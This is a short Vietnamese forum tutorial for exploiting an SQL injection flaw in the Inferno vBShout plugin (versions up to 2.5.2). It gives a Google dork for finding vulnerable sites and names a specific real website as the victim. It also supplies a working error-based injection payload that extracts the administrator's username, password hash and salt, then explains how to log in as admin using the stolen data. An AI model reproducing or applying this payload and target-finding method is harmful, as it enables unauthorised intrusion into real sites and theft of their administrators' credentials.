[ Exploit ] Inferno vBShout SQLI 0day <= 2.5.2

Vào coi exploit-db.com có cái này hay nên làm lun cái tut cho anh em coi.

Đầu tiên vào google.vn search dork sau :

Code:

inurl:infernoshout.php?do=options&area=commands

Ra được 1 nùi site. Mình chọn site này làm Victim :

 http://www.cinemekan.com/infernoshout.php?do=options&area=commands

Ô Command Input nhập :

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,

password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x 

from information_schema.tables group by x)a) AND ''='#

Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings

Sau đó nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .

Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.

tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ

Tut By X-T